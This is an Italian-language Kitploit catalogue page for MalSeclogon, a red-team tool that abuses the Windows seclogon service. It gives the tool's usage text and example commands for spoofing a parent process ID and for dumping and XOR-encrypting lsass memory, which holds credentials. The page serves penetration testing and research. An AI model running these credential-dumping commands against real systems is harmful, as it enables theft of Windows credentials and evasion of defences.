Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
MalSeclogon — Un piccolo strumento per giocare con il servizio Seclogon | Kitploit
Strumenti/GitHubGitHub/antoniococo/malseclogon
Escalation di PrivilegiMemory ForensicsExploitMovimento LateralePost-ExploitRed Teaming
GitHubantoniococo/malseclogon

MalSeclogon

Un piccolo strumento per giocare con il servizio Seclogon

Vedi Repository
327494 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

MalSeclogon

Un piccolo strumento per giocare con il servizio Seclogon.

Dettagli tecnici completi su:

  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html

Utilizzo

root@kitploit:~
        MalSeclogon v0.2
        @splinter_code

Args:
-p Pid of the process to spoof the PPID through seclogon service
-d Dump lsass method
        1 = Dump lsass by using leaked handles
        2 = Dump lsass by using leaked handles and cloned lsass process
        3 = Dump lsass by stealing handle from seclogon. (Default)
-o Output path of the dump (default C:\lsass.dmp)
-c Commandline of the spoofed process, default: cmd.exe (not compatible with -d)
-k Xor key to encrypt the dump. Compatible only with -d 3. Allowed values 1-255. Default = 40.
-f Path to an encrypted dump file. This decrypt the dump. If no -k key are specified the default value is 40.

Examples:
- Run a process with a spoofed PPID:
        Malseclogon.exe -p [PPID] -c cmd.exe
- Dump lsass by using leaked handles:
        Malseclogon.exe -d 1
- Dump lsass by using leaked handles and cloned lsass process:
        Malseclogon.exe -d 2
- Dump lsass by stealing handle from seclogon using xor key 40:
        Malseclogon.exe -d 3 -o C:\lsass.dmp.xor -k 40
- Decrypt an lsass dmp file with the key 40:
        Malseclogon.exe -f C:\lsass.dmp.xor -k 40

Istruzioni di compilazione

Non compilare le versioni "Debug" o "x86". Il binario compilato non funzionerà se si usano queste build. La build corretta da usare è "Release x64".

Scarica lo strumento